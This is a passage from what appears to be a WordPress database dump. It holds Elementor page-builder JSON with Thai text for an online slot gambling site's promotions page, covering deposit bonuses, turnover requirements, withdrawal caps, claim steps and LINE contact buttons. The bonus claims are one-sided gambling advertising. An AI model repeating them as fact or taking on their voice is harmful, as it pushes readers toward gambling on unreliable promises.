Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1274,154,'_thumbnail_id','53'),(1275,155,'_elementor_edit_mode','builder'),(1276,155,'_elementor_template_type','wp-page'),(1277,155,'_elementor_version','3.32.5'),(1278,155,'_elementor_pro_version','3.32.3'),(1279,155,'_wp_page_template','default'),(1280,155,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1281,155,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 